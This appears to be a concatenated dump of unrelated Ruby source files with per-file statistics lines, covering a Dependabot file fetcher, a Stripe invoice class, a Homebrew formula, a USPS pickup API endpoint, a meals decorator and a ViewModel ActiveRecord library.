require "dependabot/bundler/file_fetcher/path_gemspec_finder"
require "dependabot/bundler/file_fetcher/child_gemfile_finder"
require "dependabot/bundler/file_fetcher/require_relative_finder"
def self.required_files_in?(filenames)
return true if filenames.any? { |name| name.match?(%r{^[^/]*\.gemspec$}) }
filenames.include?("Gemfile") || filenames.include?("gems.rb")
end
def self.required_files_message
"Repo must contain either a Gemfile, a gemspec, or a gems.rb."
end
private
def fetch_files
fetched_files = []
fetched_files << gemfile if gemfile
fetched_files << lockfile if gemfile && lockfile
fetched_files += child_gemfiles
fetched_files += gemspecs
fetched_files << ruby_version_file if ruby_version_file
fetched_files += path_gemspecs
fetched_files += require_relative_files(fetched_files)
fetched_files = uniq_files(fetched_files)
check_required_files_present
unless self.class.required_files_in?(fetched_files.map(&:name))
raise "Invalid set of files: #{fetched_files.map(&:name)}"
end
fetched_files
end
def uniq_files(fetched_files)
uniq_files = fetched_files.reject(&:support_file?).uniq
uniq_files += fetched_files.
reject { |f| uniq_files.map(&:name).include?(f.name) }
end
def check_required_files_present
return if gemfile || gemspecs.any?
path = Pathname.new(File.join(directory, "Gemfile")).
cleanpath.to_path
raise Dependabot::DependencyFileNotFound, path
end
def gemfile
@gemfile ||= fetch_file_if_present("gems.rb") ||
fetch_file_if_present("Gemfile")
end
def lockfile
@lockfile ||= fetch_file_if_present("gems.locked") ||
fetch_file_if_present("Gemfile.lock")
end
def gemspecs
return @gemspecs if defined?(@gemspecs)
gemspecs_paths =
gemspec_directories.
flat_map do |d|
repo_contents(dir: d).
select { |f| f.name.end_with?(".gemspec") }.
map { |f| File.join(d, f.name) }
end
@gemspecs = gemspecs_paths.map { |n| fetch_file_from_host(n) }
rescue Octokit::NotFound
[]
end
def gemspec_directories
gemfiles = ([gemfile] + child_gemfiles).compact
directories =
gemfiles.flat_map do |file|
GemspecFinder.new(gemfile: file).gemspec_directories
end.uniq
directories.empty? ? ["."] : directories
end
def ruby_version_file
return unless gemfile
return unless gemfile.content.include?(".ruby-version")
@ruby_version_file ||=
fetch_file_if_present(".ruby-version")&.
tap { |f| f.support_file = true }
end
def path_gemspecs
gemspec_files = []
unfetchable_gems = []
path_gemspec_paths.each do |path|
# Get any gemspecs at the path itself
gemspecs_at_path = fetch_gemspecs_from_directory(path)
# Get any gemspecs nested one level deeper
nested_directories =
repo_contents(dir: path).
select { |f| f.type == "dir" }
nested_directories.each do |dir|
dir_path = File.join(path, dir.name)
gemspecs_at_path += fetch_gemspecs_from_directory(dir_path)
end
# Add the fetched gemspecs to the main array, and note an error if
# none were found for this path
gemspec_files += gemspecs_at_path
unfetchable_gems << path.basename.to_s if gemspecs_at_path.empty?
rescue Octokit::NotFound, Gitlab::Error::NotFound
unfetchable_gems << path.basename.to_s
end
raise Dependabot::PathDependenciesNotReachable, unfetchable_gems if unfetchable_gems.any?
gemspec_files.tap { |ar| ar.each { |f| f.support_file = true } }
end
def path_gemspec_paths
fetch_path_gemspec_paths.map { |path| Pathname.new(path) }
end
def require_relative_files(files)
ruby_files =
files.select { |f| f.name.end_with?(".rb", "Gemfile", ".gemspec") }
paths = ruby_files.flat_map do |file|
RequireRelativeFinder.new(file: file).require_relative_paths
end
@require_relative_files ||=
paths.map { |path| fetch_file_from_host(path) }.
tap { |req_files| req_files.each { |f| f.support_file = true } }
end
def fetch_gemspecs_from_directory(dir_path)
repo_contents(dir: dir_path, fetch_submodules: true).
select { |f| f.name.end_with?(".gemspec", ".specification") }.
map { |f| File.join(dir_path, f.name) }.
map { |fp| fetch_file_from_host(fp, fetch_submodules: true) }
end
def fetch_path_gemspec_paths
if lockfile
parsed_lockfile = ::Bundler::LockfileParser.
new(sanitized_lockfile_content)
parsed_lockfile.specs.
select { |s| s.source.instance_of?(::Bundler::Source::Path) }.
map { |s| s.source.path }.uniq
else
gemfiles = ([gemfile] + child_gemfiles).compact
gemfiles.flat_map do |file|
PathGemspecFinder.new(gemfile: file).path_gemspec_paths
end.uniq
end
rescue ::Bundler::LockfileError
raise Dependabot::DependencyFileNotParseable, lockfile.path
rescue ::Bundler::Plugin::UnknownSourceError
# Quietly ignore plugin errors - we'll raise a better error during
# parsing
[]
end
def child_gemfiles
return [] unless gemfile
@child_gemfiles ||=
fetch_child_gemfiles(file: gemfile, previously_fetched_files: [])
end
# TODO: Stop sanitizing the lockfile once we have bundler 2 installed
def sanitized_lockfile_content
regex = FileUpdater::LockfileUpdater::LOCKFILE_ENDING
lockfile.content.gsub(regex, "")
end
def fetch_child_gemfiles(file:, previously_fetched_files:)
paths = ChildGemfileFinder.new(gemfile: file).child_gemfile_paths
paths.flat_map do |path|
next if previously_fetched_files.map(&:name).include?(path)
next if file.name == path
fetched_file = fetch_file_from_host(path)
grandchild_gemfiles = fetch_child_gemfiles(
file: fetched_file,
previously_fetched_files: previously_fetched_files + [file]
)
[fetched_file, *grandchild_gemfiles]
end.compact
end
end
end
end
Dependabot::FileFetchers.register("bundler", Dependabot::Bundler::FileFetcher)
| 33.147465 | 97 | 0.633533 |
03df40879f1a6ad67a8a4518443ab18ff9319875 | 721 | # frozen_string_literal: true
require 'rails_helper'
describe Agent do
subject { build(:agent, :with_complete_metadata, aliases: [agent_alias]) }
let(:agent_alias) { build(:alias) }
describe '#given_name' do
its(:given_name) { is_expected.to eq('Johnny C.') }
end
describe '#sur_name' do
its(:sur_name) { is_expected.to eq('Lately') }
end
describe '#aliases' do
its(:aliases) { is_expected.to contain_exactly(agent_alias) }
end
describe '#psu_id' do
its(:psu_id) { is_expected.to eq('jcl81') }
end
describe '#email' do
its(:email) { is_expected.to eq('[email protected]') }
end
describe '#orcid_id' do
its(:orcid_id) { is_expected.to eq('00123445') }
end
end
| 21.205882 | 76 | 0.669903 |
3359087bfb0351b37ee1e53ec17111f4e93e4e45 | 607 | module Stripe
class Invoice < APIResource
include Stripe::APIOperations::List
include Stripe::APIOperations::Update
include Stripe::APIOperations::Create
def self.upcoming(params, api_key = nil)
response, api_key = Stripe.request(:get, upcoming_url, api_key, params)
Util.convert_to_stripe_object(response, api_key)
end
def pay
response, api_key = Stripe.request(:post, pay_url, @api_key)
refresh_from(response, api_key)
end
private
def self.upcoming_url
url + '/upcoming'
end
def pay_url
url + '/pay'
end
end
end
| 21.678571 | 77 | 0.673806 |
ffcc1f2f02f29fdb846053ba6586fa068088c491 | 693 | require "m2config"
include M2Config
cfg = M2Config::Config.new
server = M2Config::Server.new
exComHost = M2Config::Host.new({matching:"example.com", name:"ex"})
pubDir = M2Config::Dir.new({base:"public/",default_ctype: "text/html"})
pubRoute = M2Config::Route.new( {path:"/", target:pubDir} )
appHand = M2Config::Handler.new({ send_spec:"tcp://10.0.0.1:8989",
recv_spec:"tcp://10.0.0.1:9898",
send_ident: "dev.example.com ID" })
appRoute = M2Config::Route.new( {path:"/blog", target:appHand} )
exComHost.add_route appRoute
exComHost.add_route pubRoute
cfg["extra"] = 64
server.add_host exComHost
| 33 | 74 | 0.626263 |
5d265420cd219978420169a580fdab543abae611 | 1,447 | class Liboil < Formula
desc "C library of simple functions optimized for various CPUs"
homepage "http://liboil.freedesktop.org/"
url "http://liboil.freedesktop.org/download/liboil-0.3.17.tar.gz"
sha256 "105f02079b0b50034c759db34b473ecb5704ffa20a5486b60a8b7698128bfc69"
bottle do
cellar :any
revision 1
sha256 "7d76b7a220caeb8dbaef27b879f4f3ac0ad5b236b563961abd9484e8bc9e0160" => :el_capitan
sha1 "1d7f799090d7ccfe52341971822d3af1269ea68f" => :yosemite
sha1 "14d746548dc6e18f900e4fe67d1f1958fda68016" => :mavericks
sha1 "41590a673b637d2307b1ce287ec692e4d47b3191" => :mountain_lion
end
depends_on "pkg-config" => :build
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
def install
ENV.append "CFLAGS", "-fheinous-gnu-extensions" if ENV.compiler == :clang
system "autoreconf", "-fvi"
system "./configure", "--disable-dependency-tracking",
"--disable-silent-rules",
"--prefix=#{prefix}"
system "make"
system "make", "install"
end
test do
(testpath/"test.c").write <<-EOS.undent
#include <liboil/liboil.h>
int main(int argc, char** argv) {
oil_init();
return 0;
}
EOS
flags = ["-I#{include}/liboil-0.3", "-L#{lib}", "-loil-0.3"] + ENV.cflags.to_s.split
system ENV.cc, "test.c", "-o", "test", *flags
system "./test"
end
end
| 32.155556 | 92 | 0.657913 |
1cf18fb57e67b86d44e5618ecafe5925babe8f1a | 8,791 | # frozen_string_literal: true
# This file was auto-generated by lib/tasks/api.rake
module Usps
module Api
module Endpoints
module CarrierPickupSchedule
# The Package Pickup Schedule API schedules a
# Package Pickup and provides the user a confirmation number for the scheduled
# pickup. Prior to making a Pickup Schedule call, it is recommended to use
# the Pickup Availability API to confirm that service is available.
# @param [Hash] options
# @option options [required, Hash] carrier_pickup_schedule_request
# * *:first_name* (required, String) — Only alpha characters, apostrophes, spaces, periods, and hyphens "-" may be used. For example: <FirstName>John</FirstName>
# * *:last_name* (required, String) — Only alpha characters, apostrophes, spaces, periods and hyphens "-" may be used. For example: <LastName>Doe</LastName>
# * *:firm_name* (String) — Only alpha and numeric characters, apostrophes, spaces, hyphens "-" and ampersands "&" may be used. Use this tag for a firm or company name. Some firms/companies that have their own ZIP codes require the use of firm name to properly identify their address. Note: FirmName is Optional except if the First Name and Last Name tags are null. For example: <FirmName>ABC Company</FirmName>
# * *:suite_or_apt* (required, String) — Apartment or suite number. Optional except if needed to uniquely identify an address at a multiple dwelling address, for example, an apartment building. For example: <SuiteOrApt>Suite 777</SuiteOrApt>
# * *:address2* (required, String) — Street address. For example: <Address2>1390 Market Street</Address2>
# * *:urbanization* (required, String) — Use this tag for Urbanization (for Puerto Rico only). ZIP Code prefixes 006 to 009, if area is so designated.
# * *:city* (required, String) — City name. Either ZIP5 or City and State are required. For example: <City>Houston</City>
# * *:state* (required, String) — State abbreviation. Either ZIP5 or City and State are required. For example: <State>TX</State>
# * *:zip5* (required, String) — 5-digit ZIP Code. Either ZIP5 or City and State are required. For example: <ZIP5>77058</ZIP5>
# * *:zip4* (required, String) — Use this tag for a 4 digit ZIP Code. For example: <ZIP4>1234</ZIP4>
# * *:phone* (required, String) — Two formats are allowed: (###) 123-4567 or ###-123-4567. For example: <Phone>5555551234</Phone> or <Phone>555-555-1234</Phone>
# * *:extension* (String) — Optional value for Phone Extension. For example: <Extension>201</Extension>
# * *:package* (required, Hash) — No values entered with this tag. <ServiceType> and <Count> tags are embedded under this. Refer to the XML request example section, below, to see how these embedded tags are formatted. If the <Count> for a service type is zero, you do not need to encode a <Package> but you must have at least one <Package> with embedded <ServiceType> and <Count> tags.
# * *:service_type* (required, String) — This tag is embedded under the <Package> tag. If your pickup contains more than one Service Type, use additional <Package> tags for each service type with the accompanying <ServiceType> and <Count> tags. Refer to the XML Request Example below to see how these embedded tags are formatted. For example: <ServiceType>PriorityMailExpress</ServiceType>
# * *:count* (required, String) — This tag is embedded under the <Package> tag. Enter the number of packages for the accompanying <ServiceType> tag. Maximum characters allowed: 3 or 999 packages. If your pickup contains more than one Service Type, use additional <Package> tags for each service type with the accompanying <ServiceType> and <Count> tags. Refer to the XML request example section, below, to see how these embedded tags are formatted. For example: <Count>2</Count>
# * *:estimated_weight* (required, String) — Enter the estimated aggregate weight (in pounds) of all packages being picked up. For example: <EstimatedWeight>14</EstimatedWeight>
# * *:package_location* (required, String) — Enter one of the following values: Note: "Other" requires information in the value for the <SpecialInstructions> tag. For example: <PackageLocation>Front Door</PackageLocation>
# * *:special_instructions* (String) — Value Required when PackageLocation is “Other”. Only alpha, numeric, commas, periods, apostrophes, _, &, -, ( ), ?, #, / +, @ and space characters may be used. For example: <SpecialInstructions>Packages are behind the screen door.</SpecialInstructions>
# * *:email_address* (String) — If provided, email notifications will be sent confirming package pickup, or request changes and cancellations. Maximum characters allowed: 50. For example: <EmailAddress>[email protected]</EmailAddress>
def carrier_pickup_schedule(options = {})
throw ArgumentError.new('Required arguments :carrier_pickup_schedule_request missing') if options[:carrier_pickup_schedule_request].nil?
throw ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :first_name missing') if options[:carrier_pickup_schedule_request][:first_name].nil?
throw ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :last_name missing') if options[:carrier_pickup_schedule_request][:last_name].nil?
throw ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :address2 missing') if options[:carrier_pickup_schedule_request][:address2].nil?
throw ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :city missing') if options[:carrier_pickup_schedule_request][:city].nil?
throw ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :state missing') if options[:carrier_pickup_schedule_request][:state].nil?
throw ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :zip5 missing') if options[:carrier_pickup_schedule_request][:zip5].nil?
throw ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :phone missing') if options[:carrier_pickup_schedule_request][:phone].nil?
throw ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :package missing') if options[:carrier_pickup_schedule_request][:package].nil?
throw ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :package, :service_type missing') if options[:carrier_pickup_schedule_request][:package][:service_type].nil?
throw ArgumentError.new('Required arguments :carrier_pickup_schedule_request, :package, :count missing') if options[:carrier_pickup_schedule_request][:package][:count].nil?
request = build_request(:carrier_pickup_schedule, options)
get('https://secure.shippingapis.com/ShippingAPI.dll', {
API: 'CarrierPickupSchedule',
XML: request,
})
end
private
def tag_unless_blank(xml, tag_name, data)
xml.tag!(tag_name, data) unless data.blank? || data.nil?
end
def build_carrier_pickup_schedule_request(xml, options = {})
xml.tag!('FirstName', options[:carrier_pickup_schedule_request][:first_name])
xml.tag!('LastName', options[:carrier_pickup_schedule_request][:last_name])
tag_unless_blank(xml, 'FirmName', options[:carrier_pickup_schedule_request][:firm_name])
xml.tag!('SuiteOrApt', options[:carrier_pickup_schedule_request][:suite_or_apt])
xml.tag!('Address2', options[:carrier_pickup_schedule_request][:address2])
xml.tag!('Urbanization', options[:carrier_pickup_schedule_request][:urbanization])
xml.tag!('City', options[:carrier_pickup_schedule_request][:city])
xml.tag!('State', options[:carrier_pickup_schedule_request][:state])
xml.tag!('ZIP5', options[:carrier_pickup_schedule_request][:zip5])
xml.tag!('ZIP4', options[:carrier_pickup_schedule_request][:zip4])
xml.tag!('Phone', options[:carrier_pickup_schedule_request][:phone])
tag_unless_blank(xml, 'Extension', options[:carrier_pickup_schedule_request][:extension])
if options[:carrier_pickup_schedule_request][:packages]
options[:carrier_pickup_schedule_request][:packages].each do |pkg|
xml.tag!('Package') do
xml.tag!('ServiceType', pkg[:service_type])
xml.tag!('Count', pkg[:count])
end
end
end
xml.tag!('EstimatedWeight', options[:carrier_pickup_schedule_request][:estimated_weight])
xml.tag!('PackageLocation', options[:carrier_pickup_schedule_request][:package_location])
tag_unless_blank(xml, 'SpecialInstructions', options[:carrier_pickup_schedule_request][:special_instructions])
tag_unless_blank(xml, 'EmailAddress', options[:carrier_pickup_schedule_request][:email_address])
xml.target!
end
end
end
end
end
| 89.704082 | 485 | 0.747014 |
e89dfb49bfd2540672cb71e16667b5afbdf1e97c | 1,239 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'combine_pdf/version'
Gem::Specification.new do |spec|
spec.name = "combine_pdf"
spec.version = CombinePDF::VERSION
spec.authors = ["Boaz Segev"]
spec.email = ["[email protected]"]
spec.summary = %q{Combine, stamp and watermark PDF files in pure Ruby.}
spec.description = %q{A nifty gem, in pure Ruby, to parse PDF files and combine (merge) them with other PDF files, number the pages, watermark them or stamp them, create tables, add basic text objects etc` (all using the PDF file format).}
spec.homepage = "https://github.com/boazsegev/combine_pdf"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_runtime_dependency 'ruby-rc4', '>= 0.1.5'
spec.add_runtime_dependency 'matrix'
# spec.add_development_dependency "bundler", ">= 1.7"
spec.add_development_dependency "rake", ">= 12.3.3"
spec.add_development_dependency "minitest"
end
| 44.25 | 243 | 0.677159 |
1cd2c74c58d189c8d0b4c13cdabd03ec56e88708 | 110 | <% module_namespacing do -%>
class <%= class_name.pluralize %>Controller < ResourcesController
end
<% end -%>
| 22 | 65 | 0.718182 |
01b2b83c06c1377383674cf4919341d32422d6c9 | 4,140 | # frozen_string_literal: true
module Meals
class MealDecorator < ApplicationDecorator
delegate_all
def title_or_no_title
title || "[No Menu]"
end
def link(*url_args)
h.link_to(title_or_no_title, h.meal_url(object, *url_args))
end
def form_section(section, **options, &block)
Meals::FormSection.new(self, section, **options, &block).html
end
def current_signup
@current_signup ||= signups.detect { |s| s.household_id == h.current_user.household_id }&.decorate
end
def css_classes(highlight_signup: true)
if cancelled?
"cancelled"
elsif highlight_signup && current_signup.present?
"signed-up"
else
""
end
end
def auto_close_time_soon?
open? && auto_close_time.present? &&
auto_close_time > Time.current && auto_close_time - Time.current < 1.day
end
def closing_soon_pill
safe_str << nbsp <<
h.link_to("Closes Soon!", h.meal_path(object), class: "pill pill-emphasis pill-small")
end
def nonempty_menu_items
Meals::Meal::MENU_ITEMS.map { |i| [i, self[i]] }.to_h.reject { |_, t| t.blank? }
end
# Returns a non-persisted SignupPolicy with this meal. Used for policy checks.
def sample_signup
@sample_signup ||= Signup.new(meal: object)
end
def location_name
return @location_name if defined?(@location_name)
@location_name = calendars.first&.decorate&.name_with_prefix
end
def location_name_with_at
location_name.nil? ? nil : " at #{location_name}"
end
def location_abbrv
calendars.first&.decorate&.abbrv_with_prefix
end
def served_at_datetime
l(served_at)
end
def served_at_time_only
l(served_at, format: :time_only)
end
def served_at_lens_dependent(time_lens)
format = time_lens.upcoming? ? :wday_no_year : :default
l(served_at, format: format)
end
def served_at_wday_no_year
l(served_at, format: :wday_no_year)
end
def served_on_no_yr
l(served_at.to_date, format: :wday_no_year)
end
# We should disable the "own" community checkbox for most users.
def disable_community_checkbox?(community)
disable = (object.community == community && community_invited?(community))
disable ? "disabled" : nil
end
def cost
@cost ||= object.cost.decorate
end
def allergen_options
(community.settings.meals.allergens.split(/\s*,\s*/) + allergens).uniq.sort
end
def worker_links_for_role(role)
assignments = assignments_by_role[role] || []
links = assignments.map { |a| a.user.decorate.link(highlight: h.lenses[:user].value) }
links.present? ? h.safe_join(links, ", ") : h.content_tag(:span, "[None]", class: "weak")
end
def takeout_allowed?
formula.takeout?
end
def show_action_link_set
ActionLinkSet.new(
ActionLink.new(object, :edit, icon: "pencil", path: h.edit_meal_path(object)),
ActionLink.new(object, :summary, icon: "file-text", path: h.summary_meal_path(object)),
ActionLink.new(object, :reopen, icon: "unlock", path: h.reopen_meal_path(object),
method: :put, confirm: true),
ActionLink.new(object, :close, icon: "lock", path: h.close_meal_path(object),
method: :put, confirm: true),
ActionLink.new(object, :finalize, icon: "certificate", path: h.new_meal_finalize_path(object)),
ActionLink.new(object, :cancel, icon: "ban", path: h.new_meal_message_path(object, cancel: 1)),
ActionLink.new(object, :send_message, icon: "envelope", path: h.new_meal_message_path(object))
)
end
def edit_action_link_set
ActionLinkSet.new(
ActionLink.new(object, :destroy, icon: "trash", path: h.meal_path(object), method: :delete,
confirm: {title: title_or_no_title})
)
end
private
def form_section_summarizer
@form_section_summarizer ||= Meals::FormSectionSummarizer.new(self)
end
end
end
| 30 | 104 | 0.646377 |
39af711b64223f71314c64ab1fb1e9284b139021 | 15,853 | # frozen_string_literal: true
require 'active_support'
require 'active_record'
require 'view_model'
require 'view_model/record'
require 'lazily'
require 'concurrent'
class ViewModel::ActiveRecord < ViewModel::Record
# Defined before requiring components so components can refer to them at parse time
# for functional updates
FUNCTIONAL_UPDATE_TYPE = '_update'
ACTIONS_ATTRIBUTE = 'actions'
VALUES_ATTRIBUTE = 'values'
BEFORE_ATTRIBUTE = 'before'
AFTER_ATTRIBUTE = 'after'
require 'view_model/utils/collections'
require 'view_model/active_record/association_data'
require 'view_model/active_record/update_data'
require 'view_model/active_record/update_context'
require 'view_model/active_record/update_operation'
require 'view_model/active_record/visitor'
require 'view_model/active_record/cloner'
require 'view_model/active_record/cache'
require 'view_model/active_record/association_manipulation'
include AssociationManipulation
attr_reader :changed_associations
class << self
attr_reader :_list_attribute_name
delegate :transaction, to: :model_class
# Specifies that the model backing this viewmodel is a member of an
# `acts_as_manual_list` collection.
def acts_as_list(attr = :position)
@_list_attribute_name = attr
@generated_accessor_module.module_eval do
define_method('_list_attribute') do
model.public_send(attr)
end
define_method('_list_attribute=') do |x|
model.public_send(:"#{attr}=", x)
end
end
end
def _list_member?
_list_attribute_name.present?
end
# Adds an association from the model to this viewmodel. The associated model
# will be recursively (de)serialized by its own viewmodel type, which will
# be inferred from the model name, or may be explicitly specified.
#
# An association to a root viewmodel type will be serialized with an
# indirect reference, while a child viewmodel type will be directly nested.
#
# - +as+ sets the name of the association in the viewmodel
#
# - +viewmodel+, +viewmodels+ specifies the viewmodel(s) to use for the
# association
#
# - +external+ indicates an association external to the view. Externalized
# associations are not included in (de)serializations of the parent, and
# must be independently manipulated using `AssociationManipulation`.
# External associations may only be made to root viewmodels.
#
# - +through+ names an ActiveRecord association that will be used like an
# ActiveRecord +has_many:through:+.
#
# - +through_order_attr+ the through model is ordered by the given attribute
# (only applies to when +through+ is set).
def association(association_name,
as: nil,
viewmodel: nil,
viewmodels: nil,
external: false,
read_only: false,
through: nil,
through_order_attr: nil)
vm_association_name = (as || association_name).to_s
if through
direct_association_name = through
indirect_association_name = association_name
else
direct_association_name = association_name
indirect_association_name = nil
end
target_viewmodels = Array.wrap(viewmodel || viewmodels)
association_data = AssociationData.new(
owner: self,
association_name: vm_association_name,
direct_association_name: direct_association_name,
indirect_association_name: indirect_association_name,
target_viewmodels: target_viewmodels,
external: external,
read_only: read_only,
through_order_attr: through_order_attr)
_members[vm_association_name] = association_data
@generated_accessor_module.module_eval do
define_method vm_association_name do
_read_association(vm_association_name)
end
define_method :"serialize_#{vm_association_name}" do |json, serialize_context: self.class.new_serialize_context|
_serialize_association(vm_association_name, json, serialize_context: serialize_context)
end
end
end
# Specify multiple associations at once
def associations(*assocs, **args)
assocs.each { |assoc| association(assoc, **args) }
end
## Load instances of the viewmodel by id(s)
def find(id_or_ids, scope: nil, lock: nil, eager_include: true)
find_scope = self.model_class.all
find_scope = find_scope.order(:id).lock(lock) if lock
find_scope = find_scope.merge(scope) if scope
ViewModel::Utils.wrap_one_or_many(id_or_ids) do |ids|
models = find_scope.where(id: ids).to_a
if models.size < ids.size
missing_ids = ids - models.map(&:id)
if missing_ids.present?
raise ViewModel::DeserializationError::NotFound.new(
missing_ids.map { |id| ViewModel::Reference.new(self, id) })
end
end
vms = models.map { |m| self.new(m) }
ViewModel.preload_for_serialization(vms, lock: lock) if eager_include
vms
end
end
## Load instances of the viewmodel by scope
## TODO: is this too much of a encapsulation violation?
def load(scope: nil, eager_include: true, lock: nil)
load_scope = self.model_class.all
load_scope = load_scope.lock(lock) if lock
load_scope = load_scope.merge(scope) if scope
vms = load_scope.map { |model| self.new(model) }
ViewModel.preload_for_serialization(vms, lock: lock) if eager_include
vms
end
def deserialize_from_view(subtree_hash_or_hashes, references: {}, deserialize_context: new_deserialize_context)
model_class.transaction do
ViewModel::Utils.wrap_one_or_many(subtree_hash_or_hashes) do |subtree_hashes|
root_update_data, referenced_update_data = UpdateData.parse_hashes(subtree_hashes, references)
_updated_viewmodels =
UpdateContext
.build!(root_update_data, referenced_update_data, root_type: self)
.run!(deserialize_context: deserialize_context)
end
end
end
# Constructs a preload specification of the required models for
# serializing/deserializing this view. Cycles in the schema will be broken
# after two layers of eager loading.
def eager_includes(include_referenced: true, vm_path: [])
association_specs = {}
return nil if vm_path.count(self) > 2
child_path = vm_path + [self]
_members.each do |assoc_name, association_data|
next unless association_data.is_a?(AssociationData)
next if association_data.external?
case
when association_data.through?
viewmodel = association_data.direct_viewmodel
children = viewmodel.eager_includes(include_referenced: include_referenced, vm_path: child_path)
when !include_referenced && association_data.referenced?
children = nil # Load up to the root viewmodel, but no further
when association_data.polymorphic?
children_by_klass = {}
association_data.viewmodel_classes.each do |vm_class|
klass = vm_class.model_class.name
children_by_klass[klass] = vm_class.eager_includes(include_referenced: include_referenced, vm_path: child_path)
end
children = DeepPreloader::PolymorphicSpec.new(children_by_klass)
else
viewmodel = association_data.viewmodel_class
children = viewmodel.eager_includes(include_referenced: include_referenced, vm_path: child_path)
end
association_specs[association_data.direct_reflection.name.to_s] = children
end
DeepPreloader::Spec.new(association_specs)
end
def dependent_viewmodels(seen = Set.new, include_referenced: true, include_external: true)
return if seen.include?(self)
seen << self
_members.each_value do |data|
next unless data.is_a?(AssociationData)
next unless include_referenced || !data.referenced?
next unless include_external || !data.external?
data.viewmodel_classes.each do |vm|
vm.dependent_viewmodels(seen, include_referenced: include_referenced, include_external: include_external)
end
end
seen
end
def deep_schema_version(include_referenced: true, include_external: true)
(@deep_schema_version ||= {})[[include_referenced, include_external]] ||=
begin
vms = dependent_viewmodels(include_referenced: include_referenced, include_external: include_external)
ViewModel.schema_versions(vms).freeze
end
end
def cacheable!(**opts)
include ViewModel::ActiveRecord::Cache::CacheableView
create_viewmodel_cache!(**opts)
end
# internal
def _association_data(association_name)
association_data = self._members[association_name.to_s]
raise ArgumentError.new("Invalid association '#{association_name}'") unless association_data.is_a?(AssociationData)
association_data
end
end
def initialize(*)
super
model_is_new! if model.new_record?
@changed_associations = []
end
def serialize_members(json, serialize_context: self.class.new_serialize_context)
self.class._members.each do |member_name, member_data|
next if member_data.association? && member_data.external?
member_context =
case member_data
when AssociationData
self.context_for_child(member_name, context: serialize_context)
else
serialize_context
end
self.public_send("serialize_#{member_name}", json, serialize_context: member_context)
end
end
def destroy!(deserialize_context: self.class.new_deserialize_context)
model_class.transaction do
ViewModel::Callbacks.wrap_deserialize(self, deserialize_context: deserialize_context) do |hook_control|
changes = ViewModel::Changes.new(deleted: true)
deserialize_context.run_callback(ViewModel::Callbacks::Hook::OnChange, self, changes: changes)
hook_control.record_changes(changes)
model.destroy!
end
end
end
def association_changed!(association_name)
association_name = association_name.to_s
association_data = self.class._association_data(association_name)
if association_data.read_only?
raise ViewModel::DeserializationError::ReadOnlyAssociation.new(association_name, blame_reference)
end
unless @changed_associations.include?(association_name)
@changed_associations << association_name
end
end
def associations_changed?
@changed_associations.present?
end
# Additionally pass `changed_associations` while constructing changes.
def changes
ViewModel::Changes.new(
new: new_model?,
changed_attributes: changed_attributes,
changed_associations: changed_associations,
changed_nested_children: changed_nested_children?,
changed_referenced_children: changed_referenced_children?,
)
end
def clear_changes!
super.tap do
@changed_associations = []
end
end
def _read_association(association_name)
association_data = self.class._association_data(association_name)
associated = model.public_send(association_data.direct_reflection.name)
return nil if associated.nil?
case
when association_data.through?
# associated here are join-table models; we need to get the far side out
join_models = associated
if association_data.ordered?
attr = association_data.direct_viewmodel._list_attribute_name
join_models = join_models.sort_by { |j| j[attr] }
end
join_models.map do |through_model|
model = through_model.public_send(association_data.indirect_reflection.name)
association_data.viewmodel_class_for_model!(model.class).new(model)
end
when association_data.collection?
associated_viewmodels = associated.map do |x|
associated_viewmodel_class = association_data.viewmodel_class_for_model!(x.class)
associated_viewmodel_class.new(x)
end
# If any associated type is a list member, they must all be
if association_data.ordered?
associated_viewmodels.sort_by!(&:_list_attribute)
end
associated_viewmodels
else
associated_viewmodel_class = association_data.viewmodel_class_for_model!(associated.class)
associated_viewmodel_class.new(associated)
end
end
# Rails 6.1 introduced "previously_new_record?", but this library still
# supports activerecord >= 5.0. This is an approximation.
def self.model_previously_new?(model)
if (id_changes = model.saved_change_to_id)
old_id, _new_id = id_changes
return true if old_id.nil?
end
false
end
# Helper to return entities that were part of the last deserialization. The
# interface is complex due to the data requirements, and the implementation is
# inefficient.
#
# Intended to be used by replace_associated style methods which may touch very
# large collections that must not be returned fully. Since the collection is
# not being returned, order is also ignored.
def _read_association_touched(association_name, touched_ids:)
association_data = self.class._association_data(association_name)
associated = model.public_send(association_data.direct_reflection.name)
return nil if associated.nil?
case
when association_data.through?
# associated here are join-table models; we need to get the far side out
associated.map do |through_model|
model = through_model.public_send(association_data.indirect_reflection.name)
next unless self.class.model_previously_new?(through_model) || touched_ids.include?(model.id)
association_data.viewmodel_class_for_model!(model.class).new(model)
end.reject(&:nil?)
when association_data.collection?
associated.map do |model|
next unless self.class.model_previously_new?(model) || touched_ids.include?(model.id)
association_data.viewmodel_class_for_model!(model.class).new(model)
end.reject(&:nil?)
else
# singleton always touched by definition
model = associated
association_data.viewmodel_class_for_model!(model.class).new(model)
end
end
def _serialize_association(association_name, json, serialize_context:)
associated = self.public_send(association_name)
association_data = self.class._association_data(association_name)
json.set! association_name do
case
when associated.nil?
json.null!
when association_data.referenced?
if association_data.collection?
json.array!(associated) do |target|
self.class.serialize_as_reference(target, json, serialize_context: serialize_context)
end
else
self.class.serialize_as_reference(associated, json, serialize_context: serialize_context)
end
else
self.class.serialize(associated, json, serialize_context: serialize_context)
end
end
end
def context_for_child(member_name, context:)
# Synthetic viewmodels don't exist as far as the traversal context is
# concerned: pass through the child context received from the parent
return context if self.class.synthetic
# associations to roots start a new tree
member_data = self.class._members[member_name.to_s]
if member_data.association? && member_data.referenced?
return context.for_references
end
super
end
self.abstract_class = true
end
| 35.228889 | 123 | 0.704472 |
213ea8ccd22188362d11a93e3f69880349de9e35 | 1,131 | cask '[email protected]' do
version '2018.1.0b6,2c4679632cfb'
sha256 :no_check
